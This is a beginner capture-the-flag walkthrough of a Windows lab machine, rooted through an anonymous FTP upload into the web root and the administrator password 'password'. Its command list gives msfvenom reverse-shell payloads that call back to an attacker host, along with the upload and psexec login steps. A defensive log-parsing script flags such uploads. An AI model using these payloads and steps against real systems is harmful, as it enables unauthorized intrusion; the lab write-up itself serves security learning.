Premise

In this walk-through, we demonstrated basic and easy privilege escalation on a Windows server system through a weak administrator username and password. We gained initial access through misconfigured permissions on the FTP server.

Machine Name: Weak

Difficulty: Beginner

Skills Learned

  • Windows privilege escalation
  • FTP exploitation
  • Default Passwords

Getting a Foothold

I started by scanning the machine to see what services were running. I found an FTP server that allowed anonymous login and a web server. I quickly realized that the FTP server was hosting the files for the web server, which meant that if I could upload a file to the FTP server, I could access it through the web browser. This was my way in!

My first plan was to create a malicious ASPX file (a type of web page that can run code on the server) using Metasploit and upload it to the FTP server. I did this, and when I accessed the file through the web browser, I got a basic shell on the machine.
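The foothold above relies on two conditions a defender can catch from the FTP server's own logs: an anonymous session, and a successful upload of a file type the web server will execute. The following is an added example, not code from the original post; it triages IIS FTP logs in W3C format (the field layout date/time/c-ip/cs-username/s-ip/s-port/cs-method/cs-uri-stem/sc-status/sc-win32-status/sc-substatus/x-session/x-fullpath is assumed here and read from the `#Fields:` directive), and the sample log lines are constructed to mirror this scenario.

```python
"""Flag anonymous FTP sessions that uploaded web-executable files into a web-served tree.

Added example, not from the original write-up. Column names come from the log's
own #Fields: directive; the IIS FTP W3C layout is an assumption, and SAMPLE_LOG
is constructed for this example.
"""
import os
from typing import Dict, Iterator, List

# Extensions IIS hands to a script engine (or that reconfigure the site) rather than
# serving as static content; an anonymous upload of one into the web root is a
# remote-code-execution path, not just a defacement risk.
WEB_EXECUTABLE_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".exe", ".dll", ".config"}

# Constructed sample: one anonymous session that logs in and STORs shell.aspx
# (success), a legitimate user uploading an image, and an anonymous STOR of is.exe
# that the server rejected (550), which must not be flagged.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2024-01-01 10:00:01 10.0.0.5 - 10.0.0.10 21 USER anonymous 331 0 0 1a2b -
2024-01-01 10:00:01 10.0.0.5 anonymous 10.0.0.10 21 PASS *** 230 0 0 1a2b /
2024-01-01 10:00:05 10.0.0.5 anonymous 10.0.0.10 21 STOR shell.aspx 226 0 0 1a2b /shell.aspx
2024-01-01 10:01:00 10.0.0.7 alice 10.0.0.10 21 STOR logo.png 226 0 0 9c8d /images/logo.png
2024-01-01 10:02:00 10.0.0.5 anonymous 10.0.0.10 21 STOR is.exe 550 5 0 1a2b /is.exe
"""


def is_web_executable(path: str) -> bool:
    """True when the file extension is one the web server executes rather than serves."""
    return os.path.splitext(path)[1].lower() in WEB_EXECUTABLE_EXTENSIONS


def parse_w3c(log_text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per log entry, using the #Fields: directive for column names."""
    fields: List[str] = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue  # #Software / #Date directives carry no entries
        values = line.split()
        if not fields or len(values) != len(fields):
            continue  # malformed or truncated line: skip rather than mis-assign columns
        yield dict(zip(fields, values))


def find_anonymous_executable_uploads(log_text: str) -> List[Dict[str, str]]:
    """Return entries where an anonymous session successfully stored a web-executable file."""
    hits: List[Dict[str, str]] = []
    for entry in parse_w3c(log_text):
        if entry["cs-username"].lower() != "anonymous":
            continue
        if entry["cs-method"] != "STOR":
            continue
        # 226 = transfer complete; a 5xx status means the server rejected the upload.
        if not entry["sc-status"].startswith("2"):
            continue
        if not is_web_executable(entry["x-fullpath"]):
            continue
        hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in find_anonymous_executable_uploads(SAMPLE_LOG):
        print(f"{hit['date']} {hit['time']} anonymous upload from {hit['c-ip']}: {hit['x-fullpath']}")
```

Run against a real log directory this would be the alert condition for "anonymous write into the web root"; the fix on the server side is the same regardless of what was uploaded: disable anonymous authentication on the FTP site, or at minimum point it at a directory that IIS does not serve.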

Trying to Upgrade My Shell

The basic shell was a good start, but I wanted something more powerful, like a Meterpreter shell. I tried to create and upload a couple of different Meterpreter payloads, but I kept running into issues. It seemed like the machine was not compatible with the payloads I was creating.

Finding the Golden Ticket

Since my Meterpreter plan wasn’t working, I decided to go back to my basic shell and see what I could find. I started looking around the file system and found a “development” directory. Inside this directory, there was a readme.txt file. I opened it up, and to my surprise, it contained a message that said, “for the level of god change your password.”

I had a hunch that this was a hint for the administrator’s password. I tried to log in as “administrator” with the password “password,” and it worked! I was now the administrator of the machine. 🥳

Commands I Used

Here are some of the key commands I used during this process:

  • Connecting to the FTP server: ftp 172.31.1.11
  • Generating an ASPX payload: msfvenom -p windows/shell/reverse_tcp LHOST=172.31.1.24 LPORT=4545 -f aspx > shell.aspx
  • Generating a Meterpreter payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.31.1.24 LPORT=4546 -f exe > is.exe
  • Uploading a file to the FTP server: put is.exe
  • Checking my privileges: whoami /priv
  • Reading the readme.txt file: type readme.txt
  • Logging in as the administrator: psexec.py administrator@172.31.1.11

Video Walk-through

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.